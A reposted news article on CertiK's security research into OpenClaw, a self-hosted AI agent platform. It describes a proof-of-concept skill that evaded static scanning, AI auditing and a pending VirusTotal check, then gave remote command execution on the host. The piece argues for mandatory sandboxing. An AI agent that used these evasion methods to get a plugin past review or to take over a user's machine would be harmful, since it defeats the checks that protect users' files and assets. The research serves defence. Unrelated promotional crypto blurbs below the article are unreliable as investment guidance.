Author: Certik Recently, OpenClaw (commonly known in the industry as "Little Lobster"), an open-source, self-hosted AI agent platform, has rapidly gained popularityAuthor: Certik Recently, OpenClaw (commonly known in the industry as "Little Lobster"), an open-source, self-hosted AI agent platform, has rapidly gained popularity

Is your "crayfish" running naked? CertiK test: How the vulnerable OpenClaw Skill can fool the audit and take over your computer without authorization.

2026/03/18 20:22
6 min read
For feedback or concerns regarding this content, please contact us at [email protected]

Author: Certik

Recently, OpenClaw (commonly known in the industry as "Little Lobster"), an open-source, self-hosted AI agent platform, has rapidly gained popularity due to its flexible scalability and self-controllable deployment characteristics, becoming a phenomenal product in the personal AI agent field. Its core ecosystem, Clawhub, serves as an application marketplace, aggregating a massive number of third-party skill plugins that allow agents to unlock advanced capabilities with a single click, ranging from web search and content creation to encrypted wallet operation, on-chain interaction, and system automation. This has led to explosive growth in the ecosystem's scale and user base.

Is your crayfish running naked? CertiK test: How the vulnerable OpenClaw Skill can fool the audit and take over your computer without authorization.

But where exactly is the platform's true security boundary for these third-party skills that run in high-privilege environments?

Recently, CertiK, the world's largest Web3 security company, released its latest research on Skill security. The article points out that there is a misconception in the market regarding the security boundaries of the AI ​​agent ecosystem: the industry generally treats "Skill scanning" as the core security boundary, but this mechanism is almost useless in the face of hacker attacks.

If we compare OpenClaw to the operating system of a smart device, then Skills are the various apps installed on that system. Unlike ordinary consumer-grade apps, some Skills in OpenClaw run in a high-privilege environment, allowing them to directly access local files, call system tools, connect to external services, execute commands in the host environment, and even manipulate the user's encrypted digital assets. Once a security issue arises, it can directly lead to serious consequences such as the leakage of sensitive information, remote takeover of the device, and the theft of digital assets.

Currently, the industry-wide standard security solution for third-party skills is "pre-listing scanning and review." OpenClaw's Clawhub has also built a three-layer review and protection system: integrating VirusTotal code scanning, a static code analysis engine, and AI logic consistency detection, pushing security pop-ups to users based on risk levels, attempting to safeguard ecosystem security. However, CertiK's research and proof-of-concept attack tests have confirmed that this detection system has shortcomings in real-world attack and defense scenarios and cannot shoulder the core responsibility of security protection.

The study first dismantles the inherent limitations of existing detection mechanisms:

Static detection rules are easily bypassed. The core of this engine relies on matching code features to identify risks. For example, it might identify the combination of "reading sensitive environmental information + sending out network requests" as a high-risk behavior. However, attackers only need to make slight syntactic changes to the code to easily bypass feature matching while retaining the malicious logic. It's like giving the dangerous content a different synonym, rendering the security scanner completely ineffective.

AI auditing has inherent blind spots. Clawhub's AI auditing is positioned as a "logic consistency detector," which can only identify obvious malicious code that "declares functions that do not match actual behavior," but is helpless against exploitable vulnerabilities hidden in normal business logic. It's like trying to find a fatal trap hidden deep in the terms of a seemingly compliant contract.

Even more fatally, the review process has a fundamental design flaw: even if VirusTotal's scan results are still in a "pending" state, Skill, which has not completed the full "check-up" process, can still be directly uploaded and made public, allowing users to install it without warning, leaving an opportunity for attackers.

To verify the true severity of the risk, the CertiK research team completed a full test. The team developed a skill called "test-web-searcher," which appears to be a fully compliant web search tool with code logic that conforms to standard development practices. However, it actually embeds a remote code execution vulnerability within its normal functional flow.

This skill bypasses the detection of static engines and AI review, and can be installed normally without any security warnings while VirusTotal scan is still pending. Finally, a command was sent remotely via Telegram, which successfully triggered the vulnerability and enabled arbitrary command execution on the host device (in the demonstration, the calculator was directly controlled to pop up).

CertiK's research explicitly points out that these issues are not product bugs unique to OpenClaw, but rather a common misconception in the entire AI agent industry: the industry generally treats "approval scanning" as the core security defense, while neglecting the true foundation of security, which is mandatory isolation and granular permission control at runtime. This is similar to the core security of Apple's iOS ecosystem, which has never been the strict approval process of the App Store, but rather the system's mandatory sandbox mechanism and granular permission control, ensuring that each app can only run in its own dedicated "isolation chamber" and cannot arbitrarily obtain system permissions. However, OpenClaw's existing sandbox mechanism is optional rather than mandatory and highly dependent on manual configuration by users. Most users choose to disable the sandbox to ensure the functionality of the Skills, ultimately leaving the agent in a "naked" state. Once a Skill with vulnerabilities or malicious code is installed, it will directly lead to catastrophic consequences.

In response to the issues discovered, CertiK has also provided security guidelines:

  • For developers of AI agents such as OpenClaw, sandbox isolation must be set as the default mandatory configuration for third-party skills, and the permission control model of skills must be refined. Third-party code must never be allowed to inherit the high privileges of the host machine by default.
  • For ordinary users, a skill labeled "safe" in the Skill Marketplace simply means that it has not been detected as risky, not that it is absolutely safe. Until the official strong isolation mechanism is set as the default configuration, it is recommended to deploy OpenClaw on unimportant idle devices or virtual machines, and never place it near sensitive files, password credentials, or high-value encrypted assets.

The AI ​​agent race is currently on the verge of explosive growth, but the pace of ecosystem expansion must not outpace the pace of security development. Review and scanning can only stop basic malicious attacks, but can never constitute a security boundary for high-privilege agents. Only by shifting from "pursuing perfect detection" to "mitigating damage by defaulting to existing risks," and by forcibly establishing isolation boundaries at the runtime level, can we truly safeguard the security bottom line of AI agents and ensure the steady and long-term progress of this technological revolution.

Market Opportunity
Notcoin Logo
Notcoin Price(NOT)
$0.0003901
$0.0003901$0.0003901
-0.45%
USD
Notcoin (NOT) Live Price Chart
Disclaimer: The articles reposted on this site are sourced from public platforms and are provided for informational purposes only. They do not necessarily reflect the views of MEXC. All rights remain with the original authors. If you believe any content infringes on third-party rights, please contact [email protected] for removal. MEXC makes no guarantees regarding the accuracy, completeness, or timeliness of the content and is not responsible for any actions taken based on the information provided. The content does not constitute financial, legal, or other professional advice, nor should it be considered a recommendation or endorsement by MEXC.

You May Also Like

Bitcoin ETFs Surge with 20,685 BTC Inflows, Marking Strongest Week

Bitcoin ETFs Surge with 20,685 BTC Inflows, Marking Strongest Week

TLDR Bitcoin ETFs recorded their strongest weekly inflows since July, reaching 20,685 BTC. U.S. Bitcoin ETFs contributed nearly 97% of the total inflows last week. The surge in Bitcoin ETF inflows pushed holdings to a new high of 1.32 million BTC. Fidelity’s FBTC product accounted for 36% of the total inflows, marking an 18-month high. [...] The post Bitcoin ETFs Surge with 20,685 BTC Inflows, Marking Strongest Week appeared first on CoinCentral.
Share
Coincentral2025/09/18 02:30
ZEC Rally and G Coin — Two Altcoin Setups Worth Watching

ZEC Rally and G Coin — Two Altcoin Setups Worth Watching

The post ZEC Rally and G Coin — Two Altcoin Setups Worth Watching appeared on BitcoinEthereumNews.com. The crypto market has started the week on a bullish footing
Share
BitcoinEthereumNews2026/03/19 00:58
IP Hits $11.75, HYPE Climbs to $55, BlockDAG Surpasses Both with $407M Presale Surge!

IP Hits $11.75, HYPE Climbs to $55, BlockDAG Surpasses Both with $407M Presale Surge!

The post IP Hits $11.75, HYPE Climbs to $55, BlockDAG Surpasses Both with $407M Presale Surge! appeared on BitcoinEthereumNews.com. Crypto News 17 September 2025 | 18:00 Discover why BlockDAG’s upcoming Awakening Testnet launch makes it the best crypto to buy today as Story (IP) price jumps to $11.75 and Hyperliquid hits new highs. Recent crypto market numbers show strength but also some limits. The Story (IP) price jump has been sharp, fueled by big buybacks and speculation, yet critics point out that revenue still lags far behind its valuation. The Hyperliquid (HYPE) price looks solid around the mid-$50s after a new all-time high, but questions remain about sustainability once the hype around USDH proposals cools down. So the obvious question is: why chase coins that are either stretched thin or at risk of retracing when you could back a network that’s already proving itself on the ground? That’s where BlockDAG comes in. While other chains are stuck dealing with validator congestion or outages, BlockDAG’s upcoming Awakening Testnet will be stress-testing its EVM-compatible smart chain with real miners before listing. For anyone looking for the best crypto coin to buy, the choice between waiting on fixes or joining live progress feels like an easy one. BlockDAG: Smart Chain Running Before Launch Ethereum continues to wrestle with gas congestion, and Solana is still known for network freezes, yet BlockDAG is already showing a different picture. Its upcoming Awakening Testnet, set to launch on September 25, isn’t just a demo; it’s a live rollout where the chain’s base protocols are being stress-tested with miners connected globally. EVM compatibility is active, account abstraction is built in, and tools like updated vesting contracts and Stratum integration are already functional. Instead of waiting for fixes like other networks, BlockDAG is proving its infrastructure in real time. What makes this even more important is that the technology is operational before the coin even hits exchanges. That…
Share
BitcoinEthereumNews2025/09/18 00:32